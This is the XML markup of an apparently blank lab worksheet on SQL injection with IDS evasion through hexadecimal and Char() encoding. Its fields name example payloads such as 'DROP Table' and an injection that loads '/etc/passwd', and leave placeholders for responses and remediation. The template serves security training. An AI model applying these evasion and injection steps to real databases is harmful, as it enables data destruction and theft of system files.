          <w:p w14:paraId="32A5EDB8" w14:textId="77777777" w:rsidR="00D90BD6" w:rsidRDefault="00D90BD6" w:rsidP="00A772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0383B16" w14:textId="77777777" w:rsidR="00D90BD6" w:rsidRDefault="00D90BD6" w:rsidP="00A772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5A3D073" w14:textId="7BC95068" w:rsidR="00D90BD6" w:rsidRPr="00281162" w:rsidRDefault="00D90BD6" w:rsidP="00A772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81162" w:rsidRPr="00A77261" w14:paraId="22ECA609" w14:textId="77777777" w:rsidTr="00D90BD6">
        <w:trPr>
          <w:trHeight w:val="944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6C0A6BC" w14:textId="07C283B5" w:rsidR="00281162" w:rsidRPr="00281162" w:rsidRDefault="00281162" w:rsidP="00D90B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81162">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Evasion Using Hexadecimal Encoding Tested?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49D61D9" w14:textId="77777777" w:rsidR="00281162" w:rsidRDefault="00281162" w:rsidP="00A772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28116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Examples Used: SELECT @@version, DROP Table,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EE7962C" w14:textId="77777777" w:rsidR="00D90BD6" w:rsidRDefault="00D90BD6" w:rsidP="00A772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F2D1A04" w14:textId="77777777" w:rsidR="00D90BD6" w:rsidRDefault="00D90BD6" w:rsidP="00A772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7C95C75" w14:textId="3C05A66D" w:rsidR="00D90BD6" w:rsidRPr="00281162" w:rsidRDefault="00D90BD6" w:rsidP="00A772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81162" w:rsidRPr="00A77261" w14:paraId="2020597D" w14:textId="77777777" w:rsidTr="00D90BD6">
        <w:trPr>
          <w:trHeight w:val="944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21FA28F" w14:textId="0C503AF9" w:rsidR="00281162" w:rsidRPr="00281162" w:rsidRDefault="00281162" w:rsidP="00D90B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81162">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Did IDS Detect Modified Queries?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97A6D7F" w14:textId="77777777" w:rsidR="00281162" w:rsidRDefault="00281162" w:rsidP="00A772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28116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Logs or Alerts Observed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94F68C7" w14:textId="77777777" w:rsidR="00D90BD6" w:rsidRDefault="00D90BD6" w:rsidP="00A772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20DBE22" w14:textId="77777777" w:rsidR="00D90BD6" w:rsidRDefault="00D90BD6" w:rsidP="00A772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2AC1EA5" w14:textId="09AA0152" w:rsidR="00D90BD6" w:rsidRDefault="00D90BD6" w:rsidP="00A772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81162" w:rsidRPr="00A77261" w14:paraId="434B4F89" w14:textId="77777777" w:rsidTr="00D90BD6">
        <w:trPr>
          <w:trHeight w:val="944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54BB8B1" w14:textId="694AF346" w:rsidR="00281162" w:rsidRPr="00281162" w:rsidRDefault="00281162" w:rsidP="00D90B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81162">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Did IDS Detect Hexadecimal Payloads?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E4A84D5" w14:textId="77777777" w:rsidR="00281162" w:rsidRDefault="00281162" w:rsidP="00A772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28116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Logs or Alerts Observed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C0A375C" w14:textId="77777777" w:rsidR="00D90BD6" w:rsidRDefault="00D90BD6" w:rsidP="00A772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4F91945" w14:textId="58207D46" w:rsidR="00D90BD6" w:rsidRDefault="00D90BD6" w:rsidP="00A772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81162" w:rsidRPr="00A77261" w14:paraId="3C79AE09" w14:textId="77777777" w:rsidTr="00D90BD6">
        <w:trPr>
          <w:trHeight w:val="944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83A2729" w14:textId="4EA57C6D" w:rsidR="00281162" w:rsidRPr="00281162" w:rsidRDefault="00281162" w:rsidP="00D90B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81162">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Successful Bypass Techniques Identified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0BE54B1" w14:textId="77777777" w:rsidR="00281162" w:rsidRDefault="00281162" w:rsidP="00A772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28116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Details of Evasion Methods that Worked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5A3EFCB" w14:textId="77777777" w:rsidR="00D90BD6" w:rsidRDefault="00D90BD6" w:rsidP="00A772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9FD10C8" w14:textId="0CAC77BB" w:rsidR="00D90BD6" w:rsidRDefault="00D90BD6" w:rsidP="00A772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A77261" w:rsidRPr="00A77261" w14:paraId="4DA1F3E8" w14:textId="77777777" w:rsidTr="00D90B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D144BAC" w14:textId="34D53AA8" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00D90B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77261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EA81294" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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0DD6C70" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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995F921" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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98324CD" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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727C70E" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13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C0C4439" w14:textId="77777777" w:rsidR="00A77261" w:rsidRPr="00A77261" w:rsidRDefault="00A77261" w:rsidP="00A772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07549722" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="005D2C80" w:rsidRDefault="00BB7061" w:rsidP="00BB7061">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: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7061" w:rsidRPr="005D2C80" w14:paraId="672889CA" w14:textId="77777777" w:rsidTr="00972D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53369631" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="005D2C80" w:rsidRDefault="00BB7061" w:rsidP="00BB7061">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="702CC165" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="005D2C80" w:rsidRDefault="00BB7061" w:rsidP="00BB7061">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7219E9BA" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="005D2C80" w:rsidRDefault="00BB7061" w:rsidP="00BB7061">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4103A233" w14:textId="77777777" w:rsidR="00A77261" w:rsidRDefault="00A77261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BB7061" w:rsidRPr="00A51A96" w14:paraId="217B76CE" w14:textId="77777777" w:rsidTr="0019714C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="62138252" w14:textId="12B0243D" w:rsidR="00BB7061" w:rsidRPr="003C713F" w:rsidRDefault="00BB7061" w:rsidP="00972D9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7.11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BB7061">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Evade IDS Detection using Char Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42923F5E" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="0005171B" w:rsidRDefault="00BB7061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2861"/>
        <w:gridCol w:w="642"/>
        <w:gridCol w:w="3503"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB7061" w:rsidRPr="00BB7061" w14:paraId="05ECF5F5" w14:textId="77777777" w:rsidTr="0005171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DA8AD6A" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="000517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B7061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1B1168C4" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="00BB70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B7061" w:rsidRPr="00BB7061" w14:paraId="14917AE2" w14:textId="77777777" w:rsidTr="0005171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EA467CE" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="000517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B7061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342F45B2" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="00BB70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B7061" w:rsidRPr="00BB7061" w14:paraId="7AD54BA9" w14:textId="77777777" w:rsidTr="0005171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C23F2F0" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="000517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B7061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7A2BBBEC" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="00BB70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16E0B" w:rsidRPr="00BB7061" w14:paraId="139AE0BF" w14:textId="77777777" w:rsidTr="0005171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EDFE0CA" w14:textId="6CF4903B" w:rsidR="00F16E0B" w:rsidRPr="00BB7061" w:rsidRDefault="00F16E0B" w:rsidP="000517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16E0B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Testing Method Used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76DF5B9C" w14:textId="77777777" w:rsidR="00F16E0B" w:rsidRPr="00F16E0B" w:rsidRDefault="00F16E0B" w:rsidP="00BB70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16E0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[*Char() Function Encoding for SQL Injection]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DA01CA4" w14:textId="77777777" w:rsidR="00F16E0B" w:rsidRDefault="00F16E0B" w:rsidP="00BB70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50EE3FF" w14:textId="77777777" w:rsidR="0005171B" w:rsidRDefault="0005171B" w:rsidP="00BB70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DBF6BE4" w14:textId="67556B5D" w:rsidR="00F16E0B" w:rsidRPr="00BB7061" w:rsidRDefault="00F16E0B" w:rsidP="00BB70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B7061" w:rsidRPr="00BB7061" w14:paraId="69937ECC" w14:textId="77777777" w:rsidTr="0005171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3C48735" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="000517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B7061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Queries Used with </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB7061">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Char() </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB7061">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>function to inject SQL Injection Statements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0583DCFD" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="140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EC19C7E" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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49D6BA8" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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637FCB9" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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CE7263E" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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AB2D49D" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="00BB70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B7061" w:rsidRPr="00BB7061" w14:paraId="20A2DF3F" w14:textId="77777777" w:rsidTr="0005171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A744A4C" w14:textId="367901A2" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00F16E0B" w:rsidP="000517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16E0B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Successful IDS Evasion Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3503" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A533EEB" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="139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BB7061">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24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26A19A22" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="139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BB7061">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB7061" w:rsidRPr="00BB7061" w14:paraId="42584B2D" w14:textId="77777777" w:rsidTr="0005171B">
        <w:trPr>
          <w:trHeight w:val="1268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35B4603" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="000517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B7061">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Response Received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7F99978F" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="00BB70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16E0B" w:rsidRPr="00BB7061" w14:paraId="02D40633" w14:textId="77777777" w:rsidTr="0005171B">
        <w:trPr>
          <w:trHeight w:val="544"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E42A1BE" w14:textId="0675E2CB" w:rsidR="00F16E0B" w:rsidRPr="00BB7061" w:rsidRDefault="00F16E0B" w:rsidP="000517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16E0B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Encoded Payloads Tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2861" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3385F50A" w14:textId="4D2D193F" w:rsidR="00F16E0B" w:rsidRPr="00F16E0B" w:rsidRDefault="00F16E0B" w:rsidP="000517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 w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F16E0B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>File Load Injection ("/etc/passwd")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4145" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D43F328" w14:textId="4A2DCDA0" w:rsidR="00F16E0B" w:rsidRPr="00F16E0B" w:rsidRDefault="00F16E0B" w:rsidP="00BB70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16E0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[*Response]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F16E0B" w:rsidRPr="00BB7061" w14:paraId="115495EC" w14:textId="77777777" w:rsidTr="0005171B">
        <w:trPr>
          <w:trHeight w:val="543"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F4DEF15" w14:textId="77777777" w:rsidR="00F16E0B" w:rsidRPr="00F16E0B" w:rsidRDefault="00F16E0B" w:rsidP="000517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2861" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56D02BF2" w14:textId="1B51063D" w:rsidR="00F16E0B" w:rsidRPr="00F16E0B" w:rsidRDefault="00F16E0B" w:rsidP="000517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 w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F16E0B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>User Enumeration Injection ("root")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4145" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BD9E5E0" w14:textId="71500499" w:rsidR="00F16E0B" w:rsidRPr="00BB7061" w:rsidRDefault="00F16E0B" w:rsidP="00BB70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F16E0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[*Response]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F16E0B" w:rsidRPr="00BB7061" w14:paraId="0729EFB8" w14:textId="77777777" w:rsidTr="0005171B">
        <w:trPr>
          <w:trHeight w:val="543"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75084683" w14:textId="77777777" w:rsidR="00F16E0B" w:rsidRPr="00F16E0B" w:rsidRDefault="00F16E0B" w:rsidP="000517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2861" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DD85AEB" w14:textId="2D1D2A28" w:rsidR="00F16E0B" w:rsidRPr="00F16E0B" w:rsidRDefault="00F16E0B" w:rsidP="000517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 w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F16E0B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Wildcard Injection ("%")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4145" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5986103E" w14:textId="64C1882A" w:rsidR="00F16E0B" w:rsidRPr="00BB7061" w:rsidRDefault="00F16E0B" w:rsidP="00BB70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F16E0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[*Response]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F16E0B" w:rsidRPr="00BB7061" w14:paraId="294CD3E8" w14:textId="77777777" w:rsidTr="0005171B">
        <w:trPr>
          <w:trHeight w:val="543"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2354" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A226320" w14:textId="77777777" w:rsidR="00F16E0B" w:rsidRPr="00F16E0B" w:rsidRDefault="00F16E0B" w:rsidP="000517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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2861" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7441A2E8" w14:textId="15111A8D" w:rsidR="00F16E0B" w:rsidRPr="00F16E0B" w:rsidRDefault="00F16E0B" w:rsidP="000517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 w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F16E0B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>File Existence Check ("n.ext")</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4145" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="151387C9" w14:textId="66A31AF6" w:rsidR="00F16E0B" w:rsidRPr="00BB7061" w:rsidRDefault="00F16E0B" w:rsidP="00BB70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F16E0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[*Response]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B82334" w:rsidRPr="00BB7061" w14:paraId="6E03457E" w14:textId="77777777" w:rsidTr="0005171B">
        <w:trPr>
          <w:trHeight w:val="543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4140775" w14:textId="3507AB9B" w:rsidR="00B82334" w:rsidRPr="00F16E0B" w:rsidRDefault="00B82334" w:rsidP="000517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Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="0E910F43" w14:textId="77777777" w:rsidR="00B82334" w:rsidRPr="00F16E0B" w:rsidRDefault="00B82334" w:rsidP="00BB70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B7061" w:rsidRPr="00BB7061" w14:paraId="74CA0414" w14:textId="77777777" w:rsidTr="0005171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048CB7F" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="000517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B7061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13B3B24A" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="141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FCB6A9E" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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9C60FE7" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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E5D0F52" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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321A70B" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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D11F3FD" w14:textId="77777777" w:rsidR="00BB7061" w:rsidRPr="00BB7061" w:rsidRDefault="00BB7061" w:rsidP="00BB70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14AAE49F" w14:textId="77777777" w:rsidR="00B07F1E" w:rsidRDefault="00B07F1E" w:rsidP="00B07F1E">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Hlk189213887"/>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496769C1" w14:textId="77777777" w:rsidR="00B07F1E" w:rsidRPr="00B07F1E" w:rsidRDefault="00B07F1E" w:rsidP="00B07F1E">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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7F1E" w:rsidRPr="005D2C80" w14:paraId="67DE03DD" w14:textId="77777777" w:rsidTr="00972D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B11643A" w14:textId="77777777" w:rsidR="00B07F1E" w:rsidRPr="005D2C80" w:rsidRDefault="00B07F1E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="653EF550" w14:textId="77777777" w:rsidR="00B07F1E" w:rsidRPr="005D2C80" w:rsidRDefault="00B07F1E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="480512D9" w14:textId="77777777" w:rsidR="00B07F1E" w:rsidRDefault="00B07F1E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6CBB9899" w14:textId="77777777" w:rsidR="00B07F1E" w:rsidRDefault="00B07F1E" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2982471B" w14:textId="77777777" w:rsidR="0005171B" w:rsidRDefault="0005171B" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D21AE56" w14:textId="77777777" w:rsidR="0005171B" w:rsidRDefault="0005171B" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="636AE94B" w14:textId="77777777" w:rsidR="0005171B" w:rsidRDefault="0005171B" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5ADFD029" w14:textId="77777777" w:rsidR="0005171B" w:rsidRDefault="0005171B" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0AD69F69" w14:textId="77777777" w:rsidR="0005171B" w:rsidRDefault="0005171B" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4351B583" w14:textId="77777777" w:rsidR="0005171B" w:rsidRDefault="0005171B" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="012AB72E" w14:textId="77777777" w:rsidR="0005171B" w:rsidRDefault="0005171B" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
